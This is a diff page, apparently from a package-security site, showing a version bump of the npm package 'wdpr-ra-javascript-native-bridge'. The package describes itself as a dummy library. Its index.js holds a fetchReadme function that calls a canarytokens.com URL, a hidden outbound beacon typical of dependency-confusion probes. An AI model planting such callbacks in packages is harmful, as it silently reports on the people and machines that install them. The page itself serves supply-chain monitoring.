wdpr-ra-javascript-native-bridge 1.0.1 → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -4,7 +4,7 @@
4
4
  const https = require('https');
5
5
 
6
6
  function fetchReadme() {
7
- https.get('https://21m3rc8lsnmjf1nz9geelpfpf.canarytokens.com/readme.MD', (resp) => {
7
+ https.get('https://canarytokens.com/about/static/feedback/1imtx11pgj1z7r2h293q3swqi/index.html', (resp) => {
8
8
  let data = '';
9
9
 
10
10
  // A chunk of data has been received.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "wdpr-ra-javascript-native-bridge",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "description": "A dummy JavaScript library for example purposes.",
5
5
  "main": "index.js",
6
6
  "scripts": {